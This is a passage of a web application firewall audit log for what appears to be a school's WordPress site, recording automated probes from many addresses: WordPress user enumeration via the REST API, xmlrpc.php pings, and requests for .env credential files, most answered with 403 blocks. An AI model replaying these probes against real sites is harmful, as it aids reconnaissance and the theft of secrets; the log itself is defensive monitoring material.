smkn22-jkt.sch.id X-Real-IP: 156.253.179.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19e1cd44-C-- demo.sayHello --19e1cd44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19e1cd44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808939996216 6726 (- - -) Stopwatch2: 1746808939996216 6726; combined=5361, p1=570, p2=3728, p3=32, p4=35, p5=512, sr=82, sw=484, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19e1cd44-Z-- --347cd805-A-- [09/May/2025:23:45:02 +0700] aB4xDloC-7ITMWTA_c9fawAAAMY 103.236.140.4 57730 103.236.140.4 8181 --347cd805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --347cd805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --347cd805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746809102024139 2192 (- - -) Stopwatch2: 1746809102024139 2192; combined=912, p1=333, p2=560, p3=0, p4=0, p5=19, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --347cd805-Z-- --1a80eb77-A-- [09/May/2025:23:45:05 +0700] aB4xEVoC-7ITMWTA_c9fbQAAAME 103.236.140.4 57734 103.236.140.4 8181 --1a80eb77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1a80eb77-C-- demo.sayHello --1a80eb77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a80eb77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746809105982083 5270 (- - -) Stopwatch2: 1746809105982083 5270; combined=3963, p1=517, p2=3226, p3=30, p4=32, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a80eb77-Z-- --1239bb6c-A-- [09/May/2025:23:56:38 +0700] aB4zxi-fAO47ojYKsMr6HgAAAFg 103.236.140.4 57820 103.236.140.4 8181 --1239bb6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.41.236.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.41.236.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1239bb6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1239bb6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746809798569790 2351 (- - -) Stopwatch2: 1746809798569790 2351; combined=1131, p1=366, p2=738, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1239bb6c-Z-- --00e5e46b-A-- [09/May/2025:23:59:20 +0700] aB40aC-fAO47ojYKsMr6IAAAAEw 103.236.140.4 57826 103.236.140.4 8181 --00e5e46b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) Accept-Charset: utf-8 --00e5e46b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00e5e46b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746809960926161 801 (- - -) Stopwatch2: 1746809960926161 801; combined=352, p1=304, p2=0, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00e5e46b-Z-- --13b37170-A-- [09/May/2025:23:59:37 +0700] aB40eS-fAO47ojYKsMr6IQAAAEg 103.236.140.4 57828 103.236.140.4 8181 --13b37170-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13b37170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13b37170-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746809977661053 3284 (- - -) Stopwatch2: 1746809977661053 3284; combined=1447, p1=487, p2=928, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13b37170-Z-- --9c206443-A-- [09/May/2025:23:59:41 +0700] aB40fS-fAO47ojYKsMr6IwAAAFY 103.236.140.4 57832 103.236.140.4 8181 --9c206443-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9c206443-C-- demo.sayHello --9c206443-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c206443-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746809981237012 5213 (- - -) Stopwatch2: 1746809981237012 5213; combined=3904, p1=477, p2=3210, p3=27, p4=27, p5=95, sr=84, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c206443-Z-- --b4c78703-A-- [10/May/2025:00:26:09 +0700] aB46sR6q_ZMebht3q14lKQAAAIk 103.236.140.4 58014 103.236.140.4 8181 --b4c78703-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.113.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.113.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b4c78703-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4c78703-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746811569905473 3285 (- - -) Stopwatch2: 1746811569905473 3285; combined=1348, p1=475, p2=844, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4c78703-Z-- --9ffec805-A-- [10/May/2025:00:48:27 +0700] aB4_61qQ1nOVx9fWpZSxtwAAAAw 103.236.140.4 58118 103.236.140.4 8181 --9ffec805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ffec805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ffec805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746812907242547 3194 (- - -) Stopwatch2: 1746812907242547 3194; combined=1360, p1=469, p2=859, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ffec805-Z-- --9e11f411-A-- [10/May/2025:00:48:33 +0700] aB4_8VoC-7ITMWTA_c9fiAAAAMg 103.236.140.4 58122 103.236.140.4 8181 --9e11f411-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.62 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9e11f411-C-- demo.sayHello --9e11f411-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e11f411-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746812913430925 4743 (- - -) Stopwatch2: 1746812913430925 4743; combined=3761, p1=460, p2=3033, p3=23, p4=26, p5=157, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e11f411-Z-- --856de324-A-- [10/May/2025:00:59:38 +0700] aB5CilqQ1nOVx9fWpZSxwAAAABE 103.236.140.4 58644 103.236.140.4 8181 --856de324-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.57.189.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.57.189.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --856de324-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --856de324-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746813578628712 2911 (- - -) Stopwatch2: 1746813578628712 2911; combined=1304, p1=473, p2=801, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --856de324-Z-- --c8385313-A-- [10/May/2025:01:01:39 +0700] aB5DAx6q_ZMebht3q14lOAAAAJA 103.236.140.4 58810 103.236.140.4 8181 --c8385313-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --c8385313-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8385313-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813699438209 663 (- - -) Stopwatch2: 1746813699438209 663; combined=276, p1=246, p2=0, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8385313-Z-- --20d0e117-A-- [10/May/2025:01:01:39 +0700] aB5DAy-fAO47ojYKsMr6QgAAAFg 103.236.140.4 58812 103.236.140.4 8181 --20d0e117-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --20d0e117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20d0e117-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813699783226 684 (- - -) Stopwatch2: 1746813699783226 684; combined=294, p1=255, p2=0, p3=0, p4=0, p5=39, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20d0e117-Z-- --036d3a2d-A-- [10/May/2025:01:01:40 +0700] aB5DBFoC-7ITMWTA_c9fjgAAANE 103.236.140.4 58814 103.236.140.4 8181 --036d3a2d-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --036d3a2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --036d3a2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813700122286 671 (- - -) Stopwatch2: 1746813700122286 671; combined=272, p1=224, p2=0, p3=0, p4=0, p5=48, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --036d3a2d-Z-- --498b170b-A-- [10/May/2025:01:01:40 +0700] aB5DBC-fAO47ojYKsMr6QwAAAEU 103.236.140.4 58816 103.236.140.4 8181 --498b170b-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --498b170b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --498b170b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813700465228 639 (- - -) Stopwatch2: 1746813700465228 639; combined=263, p1=231, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --498b170b-Z-- --a3cf203b-A-- [10/May/2025:01:01:41 +0700] aB5DBR6q_ZMebht3q14lOQAAAIo 103.236.140.4 58820 103.236.140.4 8181 --a3cf203b-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --a3cf203b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3cf203b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746813701159780 713 (- - -) Stopwatch2: 1746813701159780 713; combined=320, p1=287, p2=0, p3=0, p4=0, p5=33, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3cf203b-Z-- --86b4a746-A-- [10/May/2025:01:09:46 +0700] aB5E6lqQ1nOVx9fWpZSxzgAAAAs 103.236.140.4 58900 103.236.140.4 8181 --86b4a746-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.160.122.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.160.122.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86b4a746-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86b4a746-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814186269575 2782 (- - -) Stopwatch2: 1746814186269575 2782; combined=1220, p1=406, p2=786, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86b4a746-Z-- --dfc77900-A-- [10/May/2025:01:15:28 +0700] aB5GQFqQ1nOVx9fWpZSx0gAAAAE 103.236.140.4 58914 103.236.140.4 8181 --dfc77900-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dfc77900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc77900-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746814528582950 3029 (- - -) Stopwatch2: 1746814528582950 3029; combined=1351, p1=468, p2=848, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Producer: 